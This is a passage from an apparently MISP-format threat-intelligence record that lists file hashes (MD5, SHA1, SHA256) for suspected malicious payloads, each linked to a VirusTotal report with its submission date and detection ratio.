"object_relation": "sha1",
|
|
"timestamp": "1537334474",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "2002d015-fc25-4712-a460-31be8ac249d5",
|
|
"value": "0c00df2bee83f9f7c6f2be3d9dd7557e9410a579"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1537334474",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "b8ea3d0d-7f07-477d-91f4-0841aa2c5415",
|
|
"value": "a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1537334475",
|
|
"uuid": "7b042050-b92e-404c-87e8-107c8986e1d7",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1537334475",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "3eecf2ce-db49-433d-8296-a664cf52841e",
|
|
"value": "2018-09-18T18:31:13"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1537334475",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "5e7593ee-fbb7-411a-8578-ed90875953e3",
|
|
"value": "https://www.virustotal.com/file/a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af/analysis/1537295473/"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1537334476",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "585e2605-9a59-4405-b604-1d36a87903e8",
|
|
"value": "14/58"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "11",
|
|
"timestamp": "1537334479",
|
|
"uuid": "45a9a837-c3c8-436c-a546-30547955ba2c",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "45a9a837-c3c8-436c-a546-30547955ba2c",
|
|
"referenced_uuid": "6beca7d0-c2fe-4742-b58a-014a7f542862",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1537334495",
|
|
"uuid": "5ba1dcdf-8ef4-4e0d-9331-48aa02de0b81"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1537334476",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "09127372-1658-4d8d-8929-4204b7bf853e",
|
|
"value": "3b5baecd61190e12a526c51d5ecccbbe"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1537334476",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "7968de2f-7e78-42eb-b3c9-9ab750d78126",
|
|
"value": "422288eb6941cee899c1046ccfcd94681b36230a"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1537334476",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "3c277d27-491b-4a6c-84ce-047679ff94c6",
|
|
"value": "f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1537334477",
|
|
"uuid": "6beca7d0-c2fe-4742-b58a-014a7f542862",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1537334477",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "f817657f-fa64-46b2-83d0-5baddd55e755",
|
|
"value": "2018-09-19T03:31:11"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1537334477",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "8e6ad2e0-623d-4a80-a8d1-9fd46979f486",
|
|
"value": "https://www.virustotal.com/file/f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8/analysis/1537327871/"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1537334478",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "1605e2ae-c2cb-4ec7-83b8-eae5be80768c",
|
|
"value": "10/58"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "11",
|
|
"timestamp": "1537334481",
|
|
"uuid": "d3df327a-fc5e-422f-a7a1-56849a91787a",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "d3df327a-fc5e-422f-a7a1-56849a91787a",
|
|
"referenced_uuid": "84cc3152-b806-4ef9-a3c4-e96e0b39f86d",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1537334495",
|
|
"uuid": "5ba1dcdf-7b44-4e87-838e-45f102de0b81"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1537334478",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "0b9ba36b-0d3d-4642-adb9-ba2f8b1c850d",
|
|
"value": "50ab7c696ca74e8ae322855d445e0613"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1537334478",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "b95ecbe5-d8f1-41ae-bad5-7fd612043512",
|
|
"value": "b8b0226fb4f945b68d222c62ebb02f00874f379c"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1537334479",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "f10461c6-66bc-4d98-b53c-3d14d707e994",
|
|
"value": "de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1537334479",
|
|
"uuid": "84cc3152-b806-4ef9-a3c4-e96e0b39f86d",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1537334479",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "9229de7c-a78d-4c5e-9a03-a80669988b10",
|
|
"value": "2018-09-18T10:58:17"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1537334480",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "69b5bea2-6731-4815-a928-fee550c759e4",
|
|
"value": "https://www.virustotal.com/file/de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d/analysis/1537268297/"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1537334480",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "e36c477b-83aa-479a-ab23-212692965f2e",
|
|
"value": "20/58"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "11",
|
|
"timestamp": "1537334483",
|
|
"uuid": "14197298-00cc-4d59-85a6-5cf1be917b5c",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "14197298-00cc-4d59-85a6-5cf1be917b5c",
|
|
"referenced_uuid": "e3c55821-3317-4be2-8eef-60d480f1737e",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1537334495",
|
|
"uuid": "5ba1dcdf-3544-4163-a91e-414702de0b81"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1537334480",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "0d280e5b-9777-458c-8363-5c361771d178",
|
|
"value": "56303f9c9b3ec89f4a883a4d7b079f65"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1537334481",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "4eb9bc65-7f44-474f-8e85-9c5b3482384b",
|
|
"value": "4f0d4dc8cf49e2deff34e00e362bbc81dbef1f8d"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1537334481",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "2f3fdf32-d834-4fbc-a166-a671350aa962",
|
|
"value": "7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1537334482",
|
|
"uuid": "e3c55821-3317-4be2-8eef-60d480f1737e",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1537334482",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "e412a478-b0ac-46aa-af48-a19eb9484d6e",
|
|
"value": "2018-09-19T05:10:00"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1537334482",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "7149939a-1c5a-4b67-8ae0-edd23d9c4473",
|
|
"value": "https://www.virustotal.com/file/7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa/analysis/1537333800/"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1537334482",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "c5156a8e-63da-4dca-af17-fe34c7991169",
|
|
"value": "12/58"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "11",
|
|
"timestamp": "1537334485",
|
|
"uuid": "03ebd023-1b57-415f-8a97-f37f6b1095ba",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "03ebd023-1b57-415f-8a97-f37f6b1095ba",
|
|
"referenced_uuid": "8755454f-61de-4423-a149-1d7ba841b7c3",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1537334495",
|
|
"uuid": "5ba1dcdf-1844-4820-8a9e-4eba02de0b81"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1537334483",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "21b1e49a-ae72-4d64-8ba4-4cea48439229",
|
|
"value": "55142f1d393c5ba7405239f232a6c059"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1537334483",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "2b7367c9-9efe-4928-af5a-f472cb3dfea7",
|
|
"value": "effa37b97174802f17f3c75f25928226b7cd80ba"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1537334483",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "b186fbaa-5433-4853-a899-22e268e6c9ea",
|
|
"value": "e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1537334484",
|
|
"uuid": "8755454f-61de-4423-a149-1d7ba841b7c3",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1537334484",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "d289e539-f5be-4002-9ae9-d3bf3a0c4b6c",
|
|
"value": "2018-09-18T18:37:52"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1537334484",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "9f4ff50c-787c-4ffe-bde1-c802d2f1a658",
|
|
"value": "https://www.virustotal.com/file/e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c/analysis/1537295872/"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1537334485",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "433d9d46-b96e-4c76-9134-de36185263bb",
|
|
"value": "11/58"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "11",
|
|
"timestamp": "1537334488",
|
|
"uuid": "0fea2aef-bf8b-40d9-a152-3ef21cef0096",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "0fea2aef-bf8b-40d9-a152-3ef21cef0096",
|
|
"referenced_uuid": "c6512ad6-0d9d-4082-abcc-a5fa2c6ed93a",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1537334495",
|
|
"uuid": "5ba1dcdf-5630-47c2-92cc-4bec02de0b81"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1537334485",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "281548ff-e16e-48e9-8871-7c4223471f70",
|
|
"value": "601080e36cd6a757684e0996afd9a0e6"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1537334485",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "5fa5ddcc-2902-43d2-8af3-6cf2e29c219f",
|
|
"value": "e818a9a229d93e6bfe0285c8a155dcaceb03b03d"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1537334486",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "efddf544-121e-4c33-b6c7-1e43bf310896",
|
|
"value": "d7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1537334486",
|
|
"uuid": "c6512ad6-0d9d-4082-abcc-a5fa2c6ed93a",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1537334486",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "f49f7c54-6abf-441e-af78-252779b3999b",
|
|
"value": "2018-09-19T03:31:25"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1537334487",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "4fdb1fd9-d5e9-4521-818f-912d41c677bd",
|
|
"value": "https://www.virustotal.com/file/d7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6/analysis/1537327885/"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1537334487",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "e8a2ade3-e01e-4b65-ad3c-87d11345213f",
|
|
"value": "2/58"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "11",
|
|
"timestamp": "1537334490",
|
|
"uuid": "faeff86b-7e43-4c04-b688-b6be1f62faaa",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "faeff86b-7e43-4c04-b688-b6be1f62faaa",
|
|
"referenced_uuid": "ebb05fd0-b56c-4384-bde9-b8e540af4c63",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1537334495",
|
|
"uuid": "5ba1dcdf-40fc-42d1-ac20-48e802de0b81"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1537334487",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "891b54a8-ad73-46fc-a21e-cf1f39eae44b",
|
|
"value": "3a3ae909caee915af927c29a6025d16c"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1537334488",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "68492a5d-8e23-45f7-8beb-f2f7993c0be9",
|
|
"value": "81e7207f502229769d2d7979f88235261053c24b"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1537334488",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "19113d7d-f40f-45b2-aa8d-5acb77a6d38a",
|
|
"value": "31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1537334489",
|
|
"uuid": "ebb05fd0-b56c-4384-bde9-b8e540af4c63",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1537334489",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "9707f2d5-8180-48c6-80e2-025cf0854494",
|
|
"value": "2018-09-19T03:31:19"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1537334489",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "a826a3c1-863e-4783-a3d7-6681f99f56c4",
|
|
"value": "https://www.virustotal.com/file/31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78/analysis/1537327879/"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1537334490",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "13fdd406-d4b9-4915-b544-d01eafb9c379",
|
|
"value": "42/67"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "11",
|
|
"timestamp": "1537334493",
|
|
"uuid": "f092ea7b-05e2-4d29-8196-a214407feb5e",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "f092ea7b-05e2-4d29-8196-a214407feb5e",
|
|
"referenced_uuid": "0483921b-12e2-450d-97c6-543e513e4a6a",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1537334495",
|
|
"uuid": "5ba1dcdf-78cc-4440-a082-4a7d02de0b81"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1537334490",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "00aac258-a390-4f11-bfb8-ea78eef73f68",
|
|
"value": "1ef7d145bf7153292ea33fe7c900ece9"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1537334490",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "b2c5b04a-39cf-4e61-a5d9-00601f12a8fc",
|
|
"value": "8f0323e577d4df82c7faa4cd6ba7303b38b6a26e"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1537334491",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "d901ba15-1665-4163-b728-4db92e941209",
|
|
"value": "ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1537334491",
|
|
"uuid": "0483921b-12e2-450d-97c6-543e513e4a6a",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1537334491",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "2a60357e-ee2f-464b-94fe-aaecf41cc0dd",
|
|
"value": "2018-09-19T03:31:28"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1537334491",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "7a27e755-1f59-493b-9614-e9179f2be1e6",
|
|
"value": "https://www.virustotal.com/file/ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50/analysis/1537327888/"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1537334492",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "eb43528e-3ebb-45ba-a024-ab76913aa644",
|
|
"value": "38/66"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "11",
|
|
"timestamp": "1537334495",
|
|
"uuid": "9b4f7e14-e26f-4b8e-95a6-a5494c397ad0",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "9b4f7e14-e26f-4b8e-95a6-a5494c397ad0",
|
|
"referenced_uuid": "871efca7-2ad6-4bfe-a116-dcd8cf14fb6a",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1537334495",
|
|
"uuid": "5ba1dcdf-dabc-477b-afd0-4f8f02de0b81"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1537334492",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "12f97b8f-abbd-4b32-9a94-63ff17e444c0",
|
|
"value": "a6484c6e007b1277164dd49115e5e271"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1537334492",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "2cbf9628-b3b0-49cd-927e-e210c918d760",
|
|
"value": "0308aaea4d969bc7fe4391e86b14c4908ab6adbe"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1537334493",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "097d6023-b13c-4daf-abd7-df0e70c02a0d",
|
|
"value": "09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
